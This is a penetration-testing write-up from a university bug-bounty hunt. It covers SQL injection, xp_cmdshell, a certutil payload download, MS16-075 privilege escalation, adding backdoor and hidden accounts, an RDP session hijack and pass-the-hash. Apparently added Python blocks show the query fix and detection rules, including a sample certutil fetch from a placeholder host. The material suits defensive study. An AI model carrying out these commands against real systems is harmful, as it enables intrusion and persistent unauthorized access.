Preface

I have been digging EDU SRC for a while to collect a few certificates. Along the way I also found several "pass-kill" (universal) vulnerabilities in systems shared by many schools, but the assets were few and they were all black-box tests with no technical content. Only this one has a little value: starting from an internet-facing web application, working step by step into the final server, escalating privileges and taking over the whole server's desktop.

This experiment introduces the principle of SQL injection and explains how to judge simply whether a parameter is injectable; a simple SQL injection can then be used to obtain other sensitive data.

1. Information gathering

Routine wide-net hunting for pass-kill vulnerabilities, the usual process: search FOFA for keywords such as "XX university XX system" or "XX university XX platform", or search directly for body="XX company", since a company that often develops for schools usually has several schools running the same product. That is how I came across a system like this one.

I checked the ownership and found that it belongs to a college, i.e. an educational asset. Through various search syntaxes and information gathering I found that more than ten schools are using this system. Since there are too many syntaxes to list, I only searched casually here.

2. Getting nowhere

Standard black-box process: first see what language the site is written in. ASP + IIS, a very common configuration; in EDU it is either JSP or ASP, and PHP sites are rarely seen. On an IIS site, if a file upload point turns up later, the IIS parsing vulnerability can be tested, since old IIS versions have quite a few holes.

Since it is an ASP site, out comes Yujian (御剑) for a directory brute-force first: ASP and ASPX checked, run with the 800,000-entry large dictionary.

After a cup of tea the directory brute-force finished and, sure enough, nothing came out.

Usually in this situation you can switch to a different base directory and run again, because the whole system may sit under a specifically named directory; I did not do that here for lack of time.

Since directory brute-forcing got nowhere and the system has an exposed login point, I tried brute-forcing the login instead, with all kinds of usernames.

Still failed: not one weak password came out. Student numbers and staff numbers were both tried without a single hit. So far, directory brute-forcing and password brute-forcing were both dead ends.

SQL injection next, POST injection, the usual routine, and sure enough... a sea of red. There must be filtering. A simple fuzz of SQL statement bypasses also failed.

After a round of all kinds of operations, nothing had been dug up. Digging EDU during this period I ran into this situation often and was used to it.

Since there is no injection (there is filtering), test for logic vulnerabilities instead. The password-retrieval link in the lower right corner: I love password retrieval, it is a high-incidence area for logic vulnerabilities and usually a reliable hit.

Clicking in brings up a page like this, quite simple, and the simpler the better to play with. I entered answers decisively and captured the packet.

Nothing much to see; if the response had been in JSON format there would still have been something to play with. The logic vulnerabilities I have encountered were all front-end verification of returned JSON parameters, bypassed by changing the JSON.

3. A silver lining (discovering SQL injection)

SQL injection, brute-forcing, weak passwords and logic flaws had all been tried and all failed. Just as I was ready to give up, I noticed a characteristic of the password-retrieval page: the security question column is empty at first, and as soon as you enter an account and press Enter, the question column is automatically filled in with that account's security question.

So I inferred that pressing Enter after typing the account triggers an action that automatically sends the entered account to the back end, which looks up the security question for that account and returns it to the front end. There must be an interaction with the database here, so this point is likely injectable.

So open Burp, type the account without pressing Enter, switch Burp to intercept, go back and press Enter to trigger the action, and sure enough a POST packet is captured, carrying the account.

Entering a single quotation mark produced an error: injection beyond doubt. The ordinary login point of this system was locked down tight, yet injection was still found, though in such an odd position that most people would give up when they hit the WAF.
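The account-lookup action described above is exactly the kind of endpoint that gets missed when only the login form is filtered. As an added illustration (not code from the write-up or from the system it describes), here is the lookup in its vulnerable string-concatenated form next to a parameterized version; sqlite3 stands in for MSSQL, and the table and column names are assumptions:

```python
import sqlite3


def make_db():
    # Constructed stand-in for the password-retrieval back end: an in-memory
    # sqlite3 database replaces MSSQL; table, columns and rows are made up here.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (account TEXT, question TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("20210001", "Mother's maiden name?"),
                    ("20210002", "First pet's name?")])
    return db


def lookup_question_vulnerable(db, account):
    # The pattern the write-up found: the account typed into the form is
    # concatenated straight into the query that fetches the security question,
    # so a lone quote becomes SQL syntax and the statement fails to parse.
    sql = "SELECT question FROM users WHERE account = '" + account + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def lookup_question_safe(db, account):
    # Hardened form: a bound parameter, so the input is only ever data.
    row = db.execute("SELECT question FROM users WHERE account = ?",
                     (account,)).fetchone()
    return row[0] if row else None


def probe(db, lookup, account):
    """Return 'error' when the lookup raises, otherwise the question or None.
    A database error on a single quote is the tell the write-up relied on."""
    try:
        return lookup(db, account)
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for acct in ("20210001", "'"):
        print(repr(acct),
              probe(db, lookup_question_vulnerable, acct),
              probe(db, lookup_question_safe, acct))
```

The fix has to be applied to every handler that touches the database, including background lookups fired by the front end, not just the visible login form.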

MSSQL + DBA = xp_cmdshell --os-shell

4. Bypassing and bringing CS online

certutil.exe -urlcache -split -f

The MSSQLSERVER service account can write files into its own desktop directory. Execute the CS Trojan there, and CS is online!

Although I got a shell, its privileges were too low: dumping hashes errored out, operating on the registry produced all sorts of errors; basically every operation failed because the privilege level was too low.

Now the most urgent thing is privilege escalation. First run systeminfo and tasklist to see what is there.

A Server 2012 machine with rather a lot of patches, scary. Tasklist also showed no anti-virus software; it is probably protected by a cloud WAF.

I tried several in turn, MS16-032/016, and they were all patched. The last one, MS16-075, went through and won SYSTEM privileges. 2012 machines are still relatively easy.

Bypassing the Remote Desktop group to obtain desktop control

netstat -ano showed port 3389 open and net user showed a bunch of users; I will not include the screenshots here or it gets too long. With basic information gathering done, on to the real business: the goal is desktop control. The magic tool is Mimikatz, to grab plaintext passwords. It should be mentioned that the 2021 machine can be made to yield the plaintext password directly by changing the registry. It turned out the administrator had last logged in on 5.3, and no plaintext password was caught, only the hash.

net user admin 123456 /add creates a new user: a user admin with password 123456. Then try a remote desktop connection.

An error occurred: "Connection rejected because this user account is not authorized to log on remotely." The user I created was not in the Remote Desktop group, so it could not log in.

I added admin to the Remote Desktop group with net user, still the same error. I modified the registry to turn off the firewall and released the RDP rules too, with no result. I guess the configuration change only takes effect after a restart, and restarting would certainly bring down the system on this server, which is definitely not acceptable.

After a long struggle I realized that the guest user is in the Remote Desktop group by default. I just needed to activate the guest user, and I could connect to 3389 without rebooting.

The guest user with password 123456 was activated successfully.

Logged on to the desktop over 3389 successfully, added a hidden account and manually added it to the Remote Desktop group.
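From the defender's side, the chain in this section (the SQL Server service spawning a shell through xp_cmdshell, certutil used to fetch the payload, accounts created or enabled with net user, tscon run from a SYSTEM shell) is all visible in process-creation telemetry. An added example, not from the write-up: a small rule set run over constructed Sysmon-style records; the paths, account names and URL are placeholders:

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields
# (ParentImage, Image, CommandLine, User). These are not logs from the page's
# server; the URL and account names are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c certutil.exe -urlcache -split -f http://PLACEHOLDER/x.exe x.exe",
     "user": r"NT SERVICE\MSSQLSERVER"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user admin 123456 /add", "user": r"NT AUTHORITY\SYSTEM"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user guest /active:yes", "user": r"NT AUTHORITY\SYSTEM"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\tscon.exe",
     "cmdline": "tscon 2", "user": r"NT AUTHORITY\SYSTEM"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt", "user": r"SERVER\alice"},
]

# Each rule is (name, predicate over one event); kept to the behaviours the
# write-up describes. The database service should never need a command shell.
RULES = [
    ("sqlserver_spawns_shell",
     lambda e: e["parent"].lower().endswith("sqlservr.exe")
     and e["image"].lower().endswith(("cmd.exe", "powershell.exe"))),
    ("certutil_download",
     lambda e: re.search(r"certutil(\.exe)?\s.*-urlcache", e["cmdline"], re.I) is not None),
    ("local_account_added_or_enabled",
     lambda e: re.search(r"\bnet1?(\.exe)?\s+user\s+\S+.*(/add|/active:yes)",
                         e["cmdline"], re.I) is not None),
    ("rdp_session_takeover",
     lambda e: e["image"].lower().endswith("tscon.exe")
     and e["user"].upper().endswith("SYSTEM")),
]


def detect(events):
    """Return [(rule_name, cmdline)] for every event that matches a rule,
    in event order and then rule order."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e["cmdline"]))
    return hits


if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"{name:32} {cmd}")
```

The first rule alone would have caught this intrusion at the xp_cmdshell step; disabling xp_cmdshell and not running the web application's database login as sysadmin removes that step entirely.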

5. RDP hijack failure

I could not get the password, and could not reset the password either.

So here I used RDP hijacking: upload the psexec tool and get a CMD running as SYSTEM, because only a SYSTEM command line can take over a session.

First run query user to see the session ID (the screenshot here was taken when I wrote the article, so the login time shows 6-1).

Then run tscon 2 from the SYSTEM command line. It failed: the last login was more than three days ago, the credentials had expired, and the session could not be hijacked.

6. PTH attack: logging in using the hash

Finally, the administrator's desktop was obtained through a pass-the-hash (PTH) attack, as follows.

Mimikatz command:

On the remote desktop login window that pops up, click Connect, and the administrator session logs in without a password.

The desktop looks like this; the MSSQL database management window was still open.
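On the logon side, a pass-the-hash run the way this section describes leaves a distinctive Event ID 4624 record on the host where it runs. Added example, not from the write-up, over constructed event fields; runas /netonly produces the same signature, so treat a hit as a lead to correlate with process telemetry rather than proof on its own:

```python
# Constructed Windows Security log records carrying only the Event ID 4624
# fields that matter here. Not events from the page's server; account names
# are placeholders.
SAMPLE_LOGONS = [
    {"event_id": 4624, "logon_type": 9, "logon_process": "seclogo",
     "auth_package": "Negotiate", "subject_user": r"SERVER\operator"},
    {"event_id": 4624, "logon_type": 10, "logon_process": "User32",
     "auth_package": "Negotiate", "subject_user": r"SERVER\administrator"},
    {"event_id": 4624, "logon_type": 3, "logon_process": "NtLmSsp",
     "auth_package": "NTLM", "subject_user": r"SERVER\alice"},
]


def is_pth_logon(ev):
    """Logon type 9 (NewCredentials) through the seclogo logon process with the
    Negotiate package is what a Mimikatz-style pass-the-hash leaves behind: the
    caller keeps its own session while outbound connections, such as the RDP
    connection in this section, use the substituted hash."""
    return (ev["event_id"] == 4624 and ev["logon_type"] == 9
            and ev["logon_process"].lower() == "seclogo"
            and ev["auth_package"].lower() == "negotiate")


def find_pth(events):
    """Return the accounts whose sessions produced a type-9 seclogo logon."""
    return [ev["subject_user"] for ev in events if is_pth_logon(ev)]


if __name__ == "__main__":
    print(find_pth(SAMPLE_LOGONS))
```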

In closing

To sort out the process: 1. Collect information from the internet-facing side – 2. Discover SQL injection – 3. The whole process is not technical, just very basic operations, but you can learn a lot from it. I think going from finding the problem to solving it is a very enjoyable process. In addition, I finally got the program's source code and, after auditing it, found an injection and an unauthorized access into the back end; for reasons of space they are not covered here, and the holes have been packaged up and submitted to the platform. In the end, the road of learning is long. I hope I can keep going, be a little less flashy and learn steadily, which is what matters most; having learned a little surface knowledge is no reason to show off everywhere. Maintain the right amount of humility.